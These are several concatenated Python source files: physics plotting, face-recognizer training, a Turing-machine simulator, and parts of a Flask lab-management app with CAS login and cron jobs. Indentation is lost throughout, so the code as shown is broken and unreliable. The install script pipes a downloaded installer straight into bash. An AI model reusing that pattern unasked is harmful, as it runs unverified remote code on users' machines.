print("MPair: ", len(mpair_secondary_energy), len(mpair_secondary_energy)/num_all)
print("Energies:")
print("Brems ", sum(brems_secondary_energy), sum(brems_secondary_energy)/ene_all)
print("Epair: ", sum(epair_secondary_energy), sum(epair_secondary_energy)/ene_all)
print("photo: ", sum(photo_secondary_energy), sum(photo_secondary_energy)/ene_all)
print("Ioniz: ", sum(ioniz_secondary_energy), sum(ioniz_secondary_energy)/ene_all)
print("MPair: ", sum(mpair_secondary_energy), sum(mpair_secondary_energy)/ene_all)
### PROPAGATION WITHOUT MUPAIRPRODUCTION
muon_energies = np.ones(statistics)*10**E_log
epair_secondary_energy_nomupair = []
brems_secondary_energy_nomupair = []
ioniz_secondary_energy_nomupair = []
photo_secondary_energy_nomupair = []
print("Propagate muons without MuPairProduction...")
progress = ProgressBar(statistics, pacman=True)
progress.start()
for mu_energy in muon_energies:
progress.update()
prop_nomupair.particle.position = pp.Vector3D(0, 0, 0)
prop_nomupair.particle.direction = pp.Vector3D(0, 0, -1)
prop_nomupair.particle.propagated_distance = 0
prop_nomupair.particle.energy = mu_energy
secondarys = prop_nomupair.propagate(propagation_length)
for sec in secondarys:
sec_energy = sec.energy
if sec.id == pp.particle.Data.Epair:
epair_secondary_energy_nomupair.append(sec_energy)
elif sec.id == pp.particle.Data.Brems:
brems_secondary_energy_nomupair.append(sec_energy)
elif sec.id == pp.particle.Data.DeltaE:
ioniz_secondary_energy_nomupair.append(sec_energy)
elif sec.id == pp.particle.Data.NuclInt:
photo_secondary_energy_nomupair.append(sec_energy)
elif sec.id == pp.particle.Data.MuPair:
print("Something went wrong")
# Comparison plot
plt.rcParams.update(params)
fig_all = plt.figure(
figsize=(width, 4)
)
gs = matplotlib.gridspec.GridSpec(2, 1, height_ratios=[4, 1], hspace=0.1)
x_space = np.logspace(min(np.log10(np.concatenate((ioniz_secondary_energy_nomupair,photo_secondary_energy_nomupair,brems_secondary_energy_nomupair,epair_secondary_energy_nomupair)))), E_log, 100)
ax_all = fig_all.add_subplot(gs[0])
ax_all.hist(
[
ioniz_secondary_energy,
photo_secondary_energy,
brems_secondary_energy,
epair_secondary_energy,
mpair_secondary_energy
],
histtype='step',
color = ['C3', 'C2', 'C1', 'C0', 'C4'],
log=True,
bins=x_space,
zorder = 3,
linestyle = 'dashed',
)
ax_all.hist(
[
ioniz_secondary_energy_nomupair,
photo_secondary_energy_nomupair,
brems_secondary_energy_nomupair,
epair_secondary_energy_nomupair,
np.concatenate((
ioniz_secondary_energy_nomupair,
brems_secondary_energy_nomupair,
photo_secondary_energy_nomupair,
epair_secondary_energy_nomupair)
)
],
color = ['C3', 'C2', 'C1', 'C0', 'C7'],
label=['Ionization', 'Photonuclear', 'Bremsstrahlung', r'$e$ pair production', 'Sum'],
histtype='step',
log=True,
bins=x_space,
zorder = 4,
)
ax_all.hist(
[
np.array([0])
],
color = ['C4'],
label=[r'$\mu$ pair production'],
histtype='step',
log=True,
bins=x_space,
zorder = 0,
)
plt.xscale('log')
#minor_locator = AutoMinorLocator()
#ax_all.xaxis.set_minor_locator(minor_locator)
ax_all.legend(loc='best')
ax_all.set_ylabel(r'Frequency')
#plt.xlim(left=2.5)
plt.grid(grid_conf)
plt.setp(ax_all.get_xticklabels(), visible=False)
plt.tick_params(
axis='x', # changes apply to the x-axis
which='both', # both major and minor ticks are affected
bottom=False, # ticks along the bottom edge are off
top=False, # ticks along the top edge are off
labelbottom=False
) # labels along the bottom edge are off
ax_all = fig_all.add_subplot(gs[1], sharex=ax_all)
hist_1, bin_edges_1 = np.histogram(np.concatenate((ioniz_secondary_energy_nomupair,brems_secondary_energy_nomupair,photo_secondary_energy_nomupair,epair_secondary_energy_nomupair)),
bins = x_space)
hist_2, bin_edges_2 = np.histogram(np.concatenate((epair_old, ioniz_old, brems_old, photo_old, ioniz_secondary_energy,photo_secondary_energy,brems_secondary_energy,epair_secondary_energy,mpair_secondary_energy)),
bins = x_space)
print(np.shape(x_space))
print(np.shape(hist_1))
ax_all.step(x_space[1:], hist_1/hist_2, where='pre', color='C4')
#ax_all.bar(x_space[:-1], hist_1/hist_2, width=np.diff(x_space), align='edge', fill=False)
ax_all.set_xlabel(r'$ E \cdot v \,/\, \mathrm{MeV} $')
ax_all.set_ylabel(r'ratio')
plt.ylim(0.9, 1.1)
plt.grid(grid_conf)
ax_all.axhline(y=1, linewidth=0.5, zorder=0, C = 'C7')
fig_all.tight_layout()
fig_all.savefig("build/spectrum_mupair_secondary_comparison.pdf",bbox_inches='tight')
plt.clf()
# Plot particles from secondary spectrum
plt.rcParams.update(params)
fig_all = plt.figure(
figsize=(width, 4)
)
x_space = np.logspace(min(np.log10(np.concatenate((ioniz_secondary_energy,brems_secondary_energy,photo_secondary_energy,epair_secondary_energy,mpair_secondary_energy)))), E_log, 100)
ax_all = fig_all.add_subplot(111)
ax_all.hist(
[
ioniz_secondary_energy,
photo_secondary_energy,
brems_secondary_energy,
epair_secondary_energy,
mpair_secondary_energy,
np.concatenate((
ioniz_secondary_energy,
brems_secondary_energy,
photo_secondary_energy,
epair_secondary_energy,
mpair_secondary_energy)
)
],
histtype='step',
log=True,
bins=x_space,
label=['Ionization', 'Photonuclear', 'Bremsstrahlung', r'$e$ pair production', r'$\mu$ pair production', 'Sum'],
color = ['C3', 'C2', 'C1', 'C0', 'C4', 'C7'],
zorder = 3
)
plt.xscale('log')
#minor_locator = AutoMinorLocator()
#ax_all.xaxis.set_minor_locator(minor_locator)
ax_all.legend(loc='best')
ax_all.set_xlabel(r'$ E \cdot v \,/\, \mathrm{MeV} $')
ax_all.set_ylabel(r'Frequency')
#plt.xlim(left=2.5)
plt.grid(grid_conf)
fig_all.tight_layout()
fig_all.savefig("build/spectrum_mupair_secondary.pdf",bbox_inches='tight')
plt.clf()
if __name__ == "__main__":
propagate_muons()
```
|
{
"source": "Jean1dev/Reconhecimento-Facil-",
"score": 3
}
|
#### File: python/testes yale/treinamento-yale.py
```python
import cv2
import os
import numpy as np
from PIL import Image
eigenface = cv2.face.EigenFaceRecognizer_create(40, 8000)
fisherface = cv2.face.FisherFaceRecognizer_create(3, 2000)
lbph = cv2.face.LBPHFaceRecognizer_create(2, 2, 7, 7, 50)
def getImagemComId():
caminhos = [os.path.join('yalefaces/treinamento', f) for f in os.listdir('yalefaces/treinamento')]
faces = []
ids = []
for caminhoImagem in caminhos:
imagemFace = Image.open(caminhoImagem).convert('L')
imagemNP = np.array(imagemFace, 'uint8')
id = int(os.path.split(caminhoImagem)[1].split(".")[0].replace("subject", ""))
ids.append(id)
faces.append(imagemNP)
return np.array(ids), faces
ids, faces = getImagemComId()
print("Treinando...")
eigenface.train(faces, ids)
eigenface.write('classificadorEigenYale.yml')
fisherface.train(faces, ids)
fisherface.write('classificadorFisherYale.yml')
lbph.train(faces, ids)
lbph.write('classificadorLBPHYale.yml')
print("Treinamento realizado")
```
|
{
"source": "Jean1dev/Turing-Machine",
"score": 4
}
|
#### File: Jean1dev/Turing-Machine/Turing.py
```python
import os
class TuringMachine:
def __init__(self):
print(self)
@staticmethod
def getInputData():
return input("\n\t\t\t\t\t Digite o Numero : ")
# ***********************************************************************
def divisao(self):
# ***********************************************************************
numero1 = int(self.getInputData())
numero2 = int(self.getInputData())
ret = ['>']
for item in range(numero1):
ret.append('*')
ret.append('_')
for item in range(numero2):
ret.append('*')
ret.append('_')
for item in range(int(numero1 / numero2)):
ret.append('_')
ret.append('_')
for item in range(numero1 % numero2):
ret.append('_')
estado = -1
pos = 0
while (estado != 21):
marc = []
for i in range(pos):
marc.append(' ')
marc.append('|')
auxmarc = ''.join(marc)
print('{0}'.format(auxmarc))
aux = ''.join(ret)
print('{0} \n'.format(aux))
if (estado == -1):
pos += 1
estado += 1
elif (estado == 0):
if ret[pos] == '*':
estado = 1
ret[pos] = '$'
pos += 1
elif (estado == 1):
if (ret[pos] == '*'):
pos += 1
else:
estado = 2
pos += 1
elif (estado == 2):
if (ret[pos] == '*'):
pos += 1
else:
estado = 3
pos -= 1
elif (estado == 3):
if (ret[pos] == '*'):
estado = 4
ret[pos] = '$'
pos -= 1
elif (estado == 4):
if (ret[pos] == '*'):
estado = 5
pos -= 1
else:
estado = 10
pos += 1
elif (estado == 5):
if (ret[pos] == '*'):
pos -= 1
elif (ret[pos] == '$'):
estado = 6
pos += 1
else:
pos -= 1
elif (estado == 6):
if (ret[pos] == '*'):
estado = 7
ret[pos] = '$'
pos += 1
else:
estado = 12
pos += 1
elif (estado == 7):
if (ret[pos] == '*'):
pos += 1
elif (ret[pos] == '$'):
estado = 3
pos -= 1
else:
estado = 8
pos += 1
elif (estado == 8):
if (ret[pos] == '*'):
pos += 1
elif (ret[pos] == '$'):
estado = 3
pos -= 1
else:
estado = 3
pos -= 1
elif (estado == 9):
if (ret[pos] == '_'):
estado = 10
pos += 1
elif (estado == 10):
if (ret[pos] == '$'):
estado = 10
ret[pos] = '*'
pos += 1
else:
estado = 11
pos += 1
elif (estado == 11):
if (ret[pos] == '*'):
pos += 1
else:
estado = 5
ret[pos] = '*'
pos -= 1
elif (estado == 12):
if (ret[pos] == '*'):
pos += 1
elif (ret[pos] == '$'):
estado = 13
pos += 1
else:
estado = 20
ret[pos] = '>'
pos -= 1
elif (estado == 13):
if (ret[pos] == '$'):
pos += 1
else:
estado = 14
pos += 1
elif (estado == 14):
if (ret[pos] == '*'):
pos += 1
else:
estado = 15
pos += 1
elif (estado == 15):
if (ret[pos] == '*'):
pos += 1
else:
estado = 16
ret[pos] = '*'
pos -= 1
elif (estado == 16):
if (ret[pos] == '>'):
estado = 18
pos -= 1
elif (ret[pos] == '$'):
estado = 17
pos -= 1
else:
pos -= 1
elif (estado == 17):
if (ret[pos] == '*'):
estado = 18
pos += 1
else:
pos -= 1
elif (estado == 18):
if (ret[pos] == '$'):
estado = 19
ret[pos] = '*'
pos += 1
elif (estado == 19):
if (ret[pos] == '$'):
estado = 13
pos += 1
else:
estado = 20
ret[pos] = '>'
pos -= 1
elif (estado == 20):
if (ret[pos] == '>'):
estado = 21
ret[pos] = '_'
pos += 1
else:
ret[pos] = '_'
pos -= 1
marc = []
for i in range(pos):
marc.append(' ')
marc.append('|')
auxmarc = ''.join(marc)
print('{0} \n'.format(auxmarc))
aux = ''.join(ret)
print('{0} \n'.format(aux))
p = 0
for item in range(len(ret)):
if (ret[item] == '>'):
break
p += 1
for item in range(p):
ret.remove('_')
print('Fim do procedimento ')
print(''.join(ret))
# ***********************************************************************
def igualar(self):
# ***********************************************************************
numero1 = self.getInputData()
numero2 = self.getInputData()
numero1 = int(numero1)
numero2 = int(numero2)
ret = ['>']
for item in range(numero1):
ret.append('*')
ret.append('_')
for item in range(numero2):
ret.append('*')
if (numero2 != 0):
for item in range(numero1 - numero2 + 1):
ret.append('_')
else:
for item in range(numero1):
ret.append('_')
ret.append('_')
estado = -1
pos = 0
while (estado != 9):
marc = []
for i in range(pos):
marc.append(' ')
marc.append('|')
auxmarc = ''.join(marc)
print('{0}'.format(auxmarc))
aux = ''.join(ret)
print('{0} \n'.format(aux))
if (estado == -1):
pos += 1
estado += 1
elif (estado == 0):
if ret[pos] == '*':
estado = 1
ret[pos] = '$'
pos += 1
else:
estado = 7
pos +=1
elif (estado == 1):
if (ret[pos] == '*'):
pos += 1
estado = 2;
else:
estado = 6
pos += 1
elif (estado == 2):
if (ret[pos] == '*'):
pos += 1
else:
estado = 3
pos += 1
elif (estado == 3):
if (ret[pos] == '*'):
estado = 4
ret[pos] = '$'
pos -= 1
elif(ret[pos] == '$'):
pos += 1
else:
estado = 4
ret[pos] = '$'
pos -= 1
elif (estado == 4):
if (ret[pos] == '*'):
estado = 5
pos -= 1
else:
pos -= 1
elif (estado == 5):
if (ret[pos] == '$'):
estado = 0
pos += 1
else:
pos -= 1
elif (estado == 6):
if (ret[pos] == '$'):
pos += 1
else:
estado = 7
ret[pos] = '$'
pos += 1
elif (estado == 7):
if (ret[pos] == '*'):
pos += 1
else:
estado = 8
pos -= 1
elif (estado == 8):
if (ret[pos] == '>'):
estado = 9
pos += 1
elif (ret[pos] == '$'):
ret[pos] = '*'
pos -= 1
else:
ret[pos] = '_'
pos -= 1
marc = []
for i in range(pos):
marc.append(' ')
marc.append('|')
auxmarc = ''.join(marc)
print('{0} \n'.format(auxmarc))
aux = ''.join(ret)
print('{0} \n'.format(aux))
print(''.join(ret))
# ***********************************************************************
def soma(self):
# ***********************************************************************
numero1 = self.getInputData()
numero2 = self.getInputData()
operador1 = ""
operador2 = ""
i = 0
for i in range(int(numero1)):
operador1 += "*"
i = 0
for i in range(int(numero2)):
operador2 += "*"
res = operador1 + " " + operador2 + ""
# os.system("cls")
print("\n\t\t________________________SOMA_______________________")
print("Valores: " + res)
res = list(res)
estado = "q0"
print("Estado Atual | Leu | Posicao | Escreveu | Direcao | Proximo Estado")
print("\n")
i = 0
# for i in range(len(res)):
for i, item in enumerate(res):
if res[i] == "*" and estado == "q0":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q0")
print("\n")
continue
elif res[i] == " " and estado == "q0":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q1")
print("\n")
res[i] = "*"
estado = "q1"
continue
elif res[i] == "*" and estado == "q1":
print("\tq1\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q1")
print("\n")
continue
elif res[i] == " " and estado == "q1":
print("\tq1\t "+res[i]+"\t "+str(i) +
"\t "+" \t E \t\t q2")
print("\n")
res[i - 1] = " "
estado = "q2"
print("\tq2\t "+res[i]+"\t "+str(i - 1) +
"\t "+" \t FIM \t\t q2")
break
print("\n")
print("\n")
result = ''.join(res)
print("Resultado: " + result)
# **********************************************************************
def multiplicacao(self):
# **********************************************************************
numero1 = self.getInputData()
numero2 = self.getInputData()
operador1 = ""
operador2 = ""
for i in numero1:
operador1 += "*"
for i in numero2:
operador2 += "*"
res = operador1 + " " + operador2 + " "
print("\n\t\t_____________________MULTIPLICACAO______________________________")
print("\n")
print("Valores : " + res)
res = list(res)
estado = "q0"
i = 0
print("Estado Atual | Leu | Posicao | Escreveu | Direcao | Proximo Estado")
print("\n")
while i != -2:
if res[i] == "*" and estado == "q0":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q1")
print("\n")
i += 1
elif res[i] == " " and estado == "q0":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q10")
print("\n")
estado = "q10"
i += 1
elif res[i] == "*" and estado == "q1":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q1")
print("\n")
i += 1
elif res[i] == " " and estado == "q1":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q2")
print("\n")
estado = "q2"
i += 1
elif res[i] == "*" and estado == "q2":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q2")
print("\n")
i -= 1
elif res[i] == "*" and estado == "q2":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q3")
print("\n")
estado = "q3"
i -= 1
elif res[i] == "B" and estado == "q2":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q2")
print("\n")
i += 1
elif res[i] == "*" and estado == "q3":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q4")
print("\n")
estado = "q4"
i += 1
elif res[i] == " " and estado == "q4":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q5")
print("\n")
estado = "q5"
i += 1
elif res[i] == "B" and estado == "q4":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q4")
print("\n")
i += 1
elif res[i] == "*" and estado == "q5":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q5")
print("\n")
i += 1
elif res[i] == " " and estado == "q5":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q6")
print("\n")
estado = "q6"
i -= 1
elif res[i] == '*' and estado == "q6":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q6")
print("\n")
i -= 1
elif res[i] == ' ' and estado == "q6":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q7")
print("\n")
estado = "q7"
i -= 1
elif res[i] == '*' and estado == "q7":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q4")
print("\n")
estado = "q4"
i += 1
elif res[i] == ' ' and estado == "q7":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q8")
print("\n")
estado = "q8"
i += 1
elif res[i] == 'B' and estado == "q7":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q9")
print("\n")
estado = "q9"
i -= 1
elif res[i] == ' ' and estado == "q8":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q9")
print("\n")
estado = "q9"
i -= 1
elif res[i] == 'B' and estado == "q8":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q8")
print("\n")
i += 1
elif res[i] == '*' and estado == "q9":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q9")
print("\n")
i -= 1
elif res[i] == ' ' and estado == "q9":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q9")
print("\n")
i += 1
elif res[i] == 'A' and estado == "q9":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q0")
print("\n")
estado = "q0"
i += 1
elif res[i] == '*' and estado == "q10":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q10")
print("\n")
i += 1
elif res[i] == ' ' and estado == "q10":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q11")
print("\n")
estado = "q11"
i -= 1
elif res[i] == '*' and estado == "q11":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q11")
print("\n")
i -= 1
elif res[i] == ' ' and estado == "q11":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q11")
print("\n")
i -= 1
elif res[i] == 'A' and estado == "q11":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q11")
print("\n")
i -= 1
elif i < 0 and estado == "q11":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q1")
print("\n")
estado = "q1"
i += 1
print('\n')
print('\n')
result = ''.join(res)
print("Resultado " + result )
# ***********************************************************************
def subtracao(self):
# ***********************************************************************
numero1 = self.getInputData()
numero2 = self.getInputData()
operador1 = ""
operador2 = ""
for it in numero1:
operador1 += "*"
for it in numero2:
operador2 += "*"
res = operador1 + " " + operador2 + " "
print("\n\t\t________________________SUBTRACAO________________________________")
print("Valores " + res)
print("Estado Atual | Leu | Posicao | Escreveu | Direcao | Proximo Estado")
print("\n")
estado = "q0"
res = list(res)
i = 0
while i != -2:
if res[i] == "*" and estado == "q0":
print("\tq0\t "+res[i]+"\t "+str(i)+"\t * "+" \t D \t\t q0")
print("\n")
i += 1
elif res[i] == " " and estado == "q0":
print("\tq0\t "+res[i]+"\t "+str(i)+"\t * "+" \t D \t\t q1")
print("\n")
estado = "q1"
i += 1
elif res[i] == "*" and estado == "q1":
print("\tq0\t "+res[i]+"\t "+str(i)+"\t * "+" \t D \t\t q1")
print("\n")
i += 1
elif res[i] == " " and estado == "q1":
print("\tq0\t "+res[i]+"\t "+str(i)+"\t * "+" \t D \t\t q2")
print("\n")
res[i] = " "
estado = "q2"
i -= 1
elif res[i] == "*" and estado == "q2":
print("\tq0\t "+res[i]+"\t "+str(i)+"\t * "+" \t D \t\t q3")
print("\n")
res[i] = " "
estado = "q3"
i -= 1
elif res[i] == "*" and estado == "q2":
print("\tq0\t "+res[i]+"\t "+str(i)+"\t * "+" \t D \t\t q2")
print("\n")
break
elif res[i] == "*" and estado == "q3":
print("\tq0\t "+res[i]+"\t "+str(i)+"\t * "+" \t D \t\t q3")
print("\n")
i -= 1
elif res[i] == " " and estado == "q3":
print("\tq0\t "+res[i]+"\t "+str(i)+"\t * "+" \t D \t\t q3")
print("\n")
i -= 1
elif i < 0:
print("\tq0\t "+res[i]+"\t "+str(i)+"\t * "+" \t D \t\t q4")
print("\n")
estado = "q4"
i += 1
elif res[i] == "*" and estado == "q4":
print("\tq0\t "+res[i]+"\t "+str(i)+"\t * "+" \t D \t\t q0")
print("\n")
res[i] = " "
estado = "q0"
i += 1
elif res[i] == " " and estado == "q4":
print("\tq0\t "+res[i]+"\t "+str(i)+"\t * "+" \t D \t\t q4")
print("\n")
res[i] = " "
estado = "q4"
i += 1
print('\n')
print('\n')
result = ''.join(res)
print("Resultado " + result )
#a = TuringMachine()
# a.soma()
#a.subtracao()
#a.multiplicacao()
```
|
{
"source": "jean3108/labandco",
"score": 3
}
|
#### File: jean3108/labandco/install.py
```python
import os
import sys
from pathlib import Path
APP_NAME = "Lab&Co"
PYTHON_VERSION = "3.9.2"
def run(cmd):
print(f"> {cmd}")
status = os.system(cmd)
print(f"status = {status}")
return status
print(f"Going to install {APP_NAME}")
print("Press Y to confirm")
answ = input()
if answ.lower() != "y":
sys.exit()
pyenv_root = Path(os.environ["HOME"]) / ".pyenv"
if not pyenv_root.exists():
print("Installing pyenv")
if not run("curl https://pyenv.run | bash"):
print("! Ensure that you have 'curl' installed")
sys.exit()
else:
print("Pyenv seems to be alredy installed.")
print()
if not (pyenv_root / "versions" / PYTHON_VERSION).exists():
print(f"Installing Python {PYTHON_VERSION}")
if not run(f"pyenv install {PYTHON_VERSION}"):
print(f"! Couldn't install Python version {PYTHON_VERSION}")
sys.exit()
else:
print(f"Python {PYTHON_VERSION} seems to be alredy installed. Skipping.")
print()
if not Path("env").exists():
print("Creating virtual env")
cmd = f"{pyenv_root}/versions/{PYTHON_VERSION}/bin/python3 -m venv env"
if run(cmd):
print("! Couldn't create virtualenv at 'env'")
sys.exit()
else:
print("Reusing existing virtual env 'env'.")
print("Installing Poetry")
cmd = "./env/bin/pip install poetry"
if run(cmd):
print("! Couldn't install Poetry")
sys.exit()
print("Installing or updating back-end (Python) dependencies")
cmd = ". env/bin/activate && poetry install"
if run(cmd):
print("! Couldn't install back-end dependencies")
sys.exit()
print("Installing or updating front-end (JavaScript) dependencies")
cmd = "yarn --cwd front"
if run(cmd):
print("! Couldn't install front-end dependencies")
sys.exit()
print()
print("Everything should be fine now.")
print()
print("Available commands are:")
print(os.popen("./env/bin/flask").read())
print()
print("Now run '. env/bin/activate' from your shell and you can start developping.")
```
#### File: jean3108/labandco/jobs.py
```python
import os
import sys
import click
from apscheduler.schedulers.blocking import BlockingScheduler
from apscheduler.triggers.cron import CronTrigger
from loguru import logger
job_defaults = {
'coalesce': False,
'max_instances': 4
}
scheduler = BlockingScheduler(job_defaults=job_defaults)
logger.remove(0)
logger.add(sys.stdout, format="{time} {level} {message}")
@click.group()
def cli():
pass
@cli.command()
def list():
scheduler.print_jobs()
@cli.command()
def run():
logger.info("Starting job scheduler")
scheduler.start()
def system(cmd: str):
logger.info(cmd)
status = os.system(cmd)
logger.info(cmd + " exited with status {}", status)
@scheduler.scheduled_job(CronTrigger(hour=1, minute=0, second=0))
def daily_reindex():
system("./bin/flask reindex")
@scheduler.scheduled_job(CronTrigger(hour=6, minute=0, second=0))
def daily_sync():
system("./bin/flask ldap-sync")
system("./bin/flask syncbi")
system("./bin/flask update-retard")
@scheduler.scheduled_job(CronTrigger(hour=0, minute=0, second=0))
def daily_recap():
system("./bin/flask send-notifications daily")
@scheduler.scheduled_job(CronTrigger(day_of_week="thu", hour=0, minute=0, second=0))
def weekly_notif():
system("./bin/flask send-notifications weekly")
@scheduler.scheduled_job(CronTrigger(day_of_week="tue", hour=0, minute=0, second=0))
def weekly_recap():
system("./bin/flask send-recap")
if __name__ == "__main__":
cli()
```
#### File: jean3108/labandco/noxfile.py
```python
import nox
@nox.session
def tests(session):
session.run("poetry", "install", external=True)
session.run("pytest")
@nox.session
def lint(session):
session.run("poetry", "install", external=True)
session.run("flake8", "labster")
session.run("mypy", "labster")
```
#### File: blueprints/auth/cas.py
```python
from __future__ import annotations
import json
from datetime import datetime
from urllib.parse import parse_qs, urlencode, urljoin, urlsplit, urlunsplit
import requests
import structlog
from flask import Flask, Request, abort, redirect, render_template, request, \
session, url_for
from flask_sqlalchemy import SQLAlchemy
from werkzeug.exceptions import Unauthorized
from labster.di import injector
from labster.domain2.model.profile import Profile
from labster.domain2.services.constants import get_constants
from labster.extensions import login_manager
from labster.security import get_current_user
from . import route
logger = structlog.get_logger()
db = injector.get(SQLAlchemy)
@login_manager.unauthorized_handler
def unauthorized(app: Flask, request: Request):
accept_header = request.headers.get("Accept", "")
if "application/json" in accept_header or app.testing:
abort(401)
return cas_login(app.config["CAS_SERVER"])
#
# Routes
#
@route("/login")
def login():
current_user = get_current_user()
if not current_user.is_authenticated:
if _single_user():
return render_template("auth/single_user.j2")
return render_template("auth/login_cas.j2")
return render_template("auth/redirect.j2")
def _single_user():
if "bypass" in request.args:
return False
constants = get_constants()
value = str(constants.get("single_user")).lower()
return value in {"none", "true", "y"}
@route("/login", methods=["POST"])
def login_post():
if "current_user_id" in session:
del session["current_user_id"]
return redirect(url_for(".login", _external=True))
@route("/go")
def go(app: Flask, request: Request):
accept_header = request.headers.get("Accept", "")
if "application/json" in accept_header or app.testing:
abort(401)
return cas_login(app.config["CAS_SERVER"])
@route("/callback")
def callback(app: Flask, request: Request):
ticket = request.args.get("ticket", "")
default_url = url_for(".login", _external=True)
next_url = request.args.get("next", default_url)
if not login_with_ticket(ticket, app.config["CAS_SERVER"]):
login_manager.unauthorized()
return redirect(next_url)
#
# Util
#
def cas_login(cas_server: str):
url = urljoin(cas_server, "login")
scheme, netloc, path, query, fragment = urlsplit(url)
args = parse_qs(query)
args["service"] = [url_for("auth.callback", _external=True)]
query = urlencode(args, doseq=True)
url = urlunsplit((scheme, netloc, path, query, fragment))
return redirect(url)
def login_with_ticket(ticket: str, cas_server: str):
url = urljoin(cas_server, "p3/serviceValidate")
service_url = url_for("auth.callback", _external=True)
params = {"service": service_url, "ticket": ticket, "format": "JSON"}
session = requests.Session()
r = session.get(url, params=params)
r.raise_for_status()
if r.status_code != 200:
logger.debug(
"Error during CAS ticket validation:\nresponse code: %d"
'\nContent: """\n%s\n"""',
r.status_code,
r.content,
)
raise ValueError(
f"Error during CAS ticket validation reponse code: {r.status_code}"
)
service_response = r.json()["serviceResponse"]
if "authenticationSuccess" not in service_response:
# TODO: get attr "code" for details
logger.debug(r.content)
raise Unauthorized()
auth_data = service_response["authenticationSuccess"]
# Note: this is the "old" uid
login = auth_data["user"]
attributes = auth_data["attributes"]
if login == "fermigier":
login = "poulainm"
# FIXME: uid is not the "new" uid (which is attributes["uid"])
user = get_user_by_login(login)
if not user:
raise Unauthorized()
# user = Profile(uid=uid)
# user.nom = attributes["sn"]
# user.prenom = attributes["givenName"]
# # user.roles = attributes["eduPersonAffiliation"]
#
# db.session.add(user)
login_user(user)
# TODO: add these fields to Profile
user.cas_entry = json.dumps(attributes)
user.date_last_login = datetime.utcnow()
db.session.commit()
return redirect(url_for(".login", _external=True))
def get_user_by_login(login: str) -> Profile:
# This fixes some nasty "current transaction is aborted" bug
db.session.commit()
query = db.session.query(Profile).filter_by(active=True)
user = query.filter_by(login=login).first()
return user
def login_user(user):
assert user.active
session["current_user_id"] = user.id
logger.info("User has logged in", login=user.login, uid=user.uid)
```
#### File: blueprints/auth/__init__.py
```python
from __future__ import annotations
from flask import Blueprint
blueprint = Blueprint("auth", __name__, template_folder="templates", url_prefix="")
route = blueprint.route
__all__ = ()
@blueprint.record
def configure(state):
from . import backdoors, cas
```
#### File: blueprints/bi/__init__.py
```python
from __future__ import annotations
from flask import Blueprint
blueprint = Blueprint("bi", __name__, template_folder="templates", url_prefix="/bi")
route = blueprint.route
@blueprint.record
def configure(state):
from . import views
```
#### File: labster/blueprints/main.py
```python
from __future__ import annotations
import mimetypes
from datetime import datetime
import magic
from abilian.core.models.blob import Blob
from flask import Blueprint, Request, make_response, redirect, \
render_template, request
from flask_sqlalchemy import SQLAlchemy
from werkzeug.exceptions import Forbidden, NotFound
from labster.domain2.model.demande import Demande, DemandeRH
from labster.domain2.model.profile import Profile
from labster.domain2.model.structure import StructureRepository
from labster.domain2.services.constants import get_constants
from labster.domain2.services.documents_generes import devis_rh, \
lettre_commande_rh
from labster.rbac import acces_restreint, check_can_add_pj, \
check_read_access, feuille_cout_editable
from labster.rpc.commands.demandes import cleanup_model
from labster.security import get_current_profile, login_required
blueprint = Blueprint("main", __name__, url_prefix="")
route = blueprint.route
__all__ = ()
@blueprint.before_request
@login_required
def before_request():
pass
@route("/")
def home() -> str:
return render_template("v3.j2")
@route("/calculettes/feuille_cout")
def calculette_feuille_cout():
constants = get_constants()
model = {
"id": None,
"editable": True,
"constants": constants["convention"],
"couts_charges": constants["recrutement"]["couts_charges"],
}
model["constants"]["POINT_INDICE"] = constants["point_indice"]
return render_template("calculette_feuille_cout.html", model=model)
@route("/feuille_cout/<id>")
def feuille_cout(id: int, db: SQLAlchemy):
constants = get_constants()
demande = db.session.query(Demande).get(id)
check_read_access(demande)
model = demande.feuille_cout or {}
model["id"] = demande.id
model["editable"] = feuille_cout_editable(demande)
model["constants"] = constants["convention"]
model["constants"]["POINT_INDICE"] = constants["point_indice"]
model["couts_charges"] = constants["recrutement"]["couts_charges"]
return render_template("calculette_feuille_cout.html", model=model)
@route("/blob/<int:demande_id>/<int:blob_id>")
def blob(demande_id: int, blob_id: int, db: SQLAlchemy):
